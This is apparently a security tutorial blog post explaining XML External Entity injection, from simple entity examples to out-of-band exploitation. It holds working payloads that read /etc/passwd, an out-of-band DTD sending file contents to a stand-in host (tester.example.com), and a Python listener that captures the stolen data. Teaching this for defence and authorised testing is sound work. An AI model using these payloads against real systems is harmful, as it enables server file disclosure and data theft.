XXE: XML External Entity Injection

Published: 12 July 2020

XML External Entity (XXE) Injection is a powerful vulnerability that can allow confidential data theft and, in rare cases, command execution. It was often overlooked for a while, but now that it features in the OWASP Top 10 (as A4 in the 2017 edition) it's a lot more well known.

The issue arises in XML parsers that process external entities, which can allow attacker-supplied URIs to be loaded.

Wait, back up. What's an entity? An easy way to think of an entity is as a variable. It can hold strings, so an entity can be used in XML to hold text content, or it can be used with a URI to load remote content.

If you have an application which processes XML you're going to see something like this:

<?xml version='1.0' encoding='UTF-8'?> 
<todo>
<item>Buy more Toilet Roll</item>
</todo>

With many parsers you can modify this content and define entities. Here's a simple example with an entity defined:

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE replace [<!ENTITY example "Toilet Roll"> ]>
<todo>
<item>Buy more &example;</item>
</todo>

In the above example you can see some XML with a DTD (that's the DOCTYPE line) which defines an internal entity. This one is "internal" because it is defined entirely within the DTD; it doesn't reference any external resources. When this XML is parsed, the part that reads "&example;" within the item node is replaced with the value of the example entity, which is Toilet Roll.

Like this:

[Figure: An internal entity in use. This example uses an internal entity, much like a common programming variable, to cause a chosen string to be included in the application output.]

That's an internal entity in use: the message in the input box at the bottom has been sent to the application, and the application has output "Buy more Toilet Roll", showing that the internal entity has been parsed.
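If you want to reproduce the substitution locally, here is a minimal sketch in Python. It assumes the standard library's xml.etree.ElementTree parser, which expands internal entities declared in the document's own DTD; the function name first_item_text is just an illustrative helper, not something the application in the screenshot uses.

```python
import xml.etree.ElementTree as ET

# The example document from above, with an internal entity named "example".
TODO_XML = b"""<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE replace [<!ENTITY example "Toilet Roll"> ]>
<todo>
<item>Buy more &example;</item>
</todo>
"""


def first_item_text(xml_bytes):
    """Parse the document and return the text of the first <item> node."""
    root = ET.fromstring(xml_bytes)
    return root.findtext("item")


print(first_item_text(TODO_XML))  # prints: Buy more Toilet Roll
```

The parser has already replaced &example; by the time the application code reads the item text, which is why the application never sees the entity reference itself.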

Internal entities are not usually a big deal from a security point of view. However, if we change the syntax slightly we can define an external entity, which opens up the ability to load remote resources.

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]> 
<todo>
<item>Buy more &example;</item>
</todo>

This will load the supplied URI and include its content within the application response. Here a file: URI is used, so it may be possible to access server-side files, but other URI schemes can lead to related issues, such as https: allowing server-side requests to be sent, possibly bypassing firewall restrictions to access internal applications.

[Figure: An external entity in use. This example causes confidential data disclosure by requesting the content of a file on the web server. Here you can see the /etc/passwd file disclosed.]
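To see the same behaviour without touching a real system file, the following is a rough sketch using Python's xml.sax module. It assumes a Linux-like environment, and it uses a throwaway temporary file as a stand-in for /etc/passwd. The helper names (TextCollector, parse_text, build_document, demo) are made up for this illustration. Since Python 3.7.1 xml.sax does not process external general entities by default, so the sketch switches the feature on explicitly to mimic a vulnerable parser configuration.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external):
    """Return the document's text, optionally resolving external entities."""
    parser = xml.sax.make_parser()
    # True mimics a vulnerable configuration; False is the modern default.
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def build_document(target_uri):
    """Build the article's todo document with an external entity for target_uri."""
    return (
        "<?xml version='1.0' encoding='UTF-8'?>\n"
        f'<!DOCTYPE replace [<!ENTITY example SYSTEM "{target_uri}"> ]>\n'
        "<todo>\n<item>Buy more &example;</item>\n</todo>\n"
    ).encode("utf-8")


def demo():
    """Parse the same document with and without external entity resolution."""
    with tempfile.TemporaryDirectory() as tmp:
        # Hypothetical stand-in for a sensitive server-side file.
        secret = Path(tmp) / "secret.txt"
        secret.write_text("s3cr3t-value", encoding="utf-8")
        doc = build_document(secret.as_uri())
        return parse_text(doc, True), parse_text(doc, False)
```

Calling demo() returns two strings: the first should contain the temporary file's content in place of &example;, while the second should not, because the parser skips the external entity when the feature is off.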

As mentioned above, in rare cases it's possible to achieve remote code execution, and it can also be possible to cause denial of service conditions. Denial of service may be achieved by accessing resources which never finish returning data (such as /dev/urandom), and code execution can be achieved if non-default modules, such as PHP's expect: wrapper, are loaded. Like this:

[Figure: In rare cases, such as when the non-default expect module is loaded, remote command execution can be achieved.]

Out of Band Exploitation

It's also possible to exploit XXE out of band, meaning that if an application processes XML but does not render the output within its response, it's still possible to exfiltrate confidential data. This is achieved by making the vulnerable parser forward the file content to an external server.

This attack takes two steps. The first is to host a DTD on a web server that the target can reach, something like this:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://tester.example.com/log_xxe?data=%payload;'>"> 

The intention of this file is to load the target file (in this example /etc/passwd) and append its content to the end of a web request to a server you can access (in this case tester.example.com). The second step is to send a request that utilises this DTD to the vulnerable web server, like the below:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://tester.example.com/xxe_file"> %pe; %param1; ]>
<foo>&external;</foo> 

This would cause the vulnerable application to load the remote DTD, which executes as described above. You can verify the exploit worked by checking the server logs: an initial request will be logged for xxe_file, followed shortly by a request containing the file content.
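For an authorised test, any web server with access logs will do for hosting the DTD. As a sketch only, the listener below uses Python's standard http.server to serve the DTD at /xxe_file and record whatever arrives at /log_xxe. The names XXEHandler, make_listener, public_base and captured are hypothetical, and the default public_base of http://tester.example.com is simply the placeholder host from the example above.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

# DTD body from the example above; {base} is filled in with the listener's URL.
DTD_TEMPLATE = (
    '<!ENTITY % payload SYSTEM "file:///etc/passwd">\n'
    '<!ENTITY % param1 "<!ENTITY external SYSTEM '
    "'{base}/log_xxe?data=%payload;'>\">\n"
)


class XXEHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        url = urlsplit(self.path)
        if url.path == "/xxe_file":
            # Step one: the vulnerable parser fetches the hosted DTD.
            body = DTD_TEMPLATE.format(base=self.server.public_base).encode()
            self._reply(200, body, "application/xml-dtd")
        elif url.path == "/log_xxe":
            # Step two: the parser calls back with the data in the query string.
            data = parse_qs(url.query).get("data", [""])[0]
            self.server.captured.append(data)
            self._reply(200, b"", "text/plain")
        else:
            self._reply(404, b"", "text/plain")

    def _reply(self, status, body, content_type):
        self.send_response(status)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def make_listener(host="127.0.0.1", port=8000,
                  public_base="http://tester.example.com"):
    """Create (but do not start) the listener; call serve_forever() to run it."""
    server = HTTPServer((host, port), XXEHandler)
    server.public_base = public_base  # URL the target uses to reach this host
    server.captured = []              # data values received on /log_xxe
    return server
```

Running make_listener().serve_forever() starts the listener. Each request is also written to stderr by http.server's default logging, so you should see the request for xxe_file followed by the log_xxe callback, as described above.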